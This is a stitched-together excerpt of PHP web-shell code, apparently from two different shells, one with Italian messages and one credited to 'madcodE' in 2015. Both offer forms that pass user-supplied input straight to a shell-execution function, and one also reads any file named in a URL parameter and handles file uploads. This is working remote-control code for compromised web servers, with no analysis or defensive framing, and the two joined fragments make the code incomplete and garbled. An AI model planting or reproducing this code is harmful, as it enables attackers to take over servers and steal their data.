$id = $_GET['id']; $fp = fopen($id, "r"); $read = fread($fp, filesize($id)); print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities($read) . "</pre></td>\n</tr>\n</table>\n"; fclose($fp); break; } break; case "execute": $command = $_POST['command']; if (!isset($_POST['command'])) { print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n"; print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n"; print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>"; } else { $ret = shellexec($command); if ($ret == "") { print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n"; } else { print "Executing the following command:<br />\n"; print "<textarea rows = '5' cols = '60'>" . $command . "</textarea><br />\n"; print "Result:<br /> <textarea rows = '5' cols = '60'>" . $ret . "</textarea><br /><br /><br />\n"; } } break; case "hasher": print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n"; print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n"; print "<tr>\n<td><select name = 'type'>\n"; print "<option>md4</option>\n"; print "<option>md5</option>\n";
# if fails to write. echo "<span id='error'>Error uploading file. </span>"; } } } /** check if user call for command execution @author Ahsan Shabbir **/ if ($action == "cmd") { if (!isset($_POST['cmd'])) { #Set default command if no command is set. $cmd = "ls -la"; } else { $cmd = $_POST['cmd']; } # display result in preformatted text echo "<pre>" . shellexec($cmd) . "</pre>"; } ?> </div> <br> <div id="shadow"> <?php echo $title; ?> coded by madcodE © 2015 </div> </html>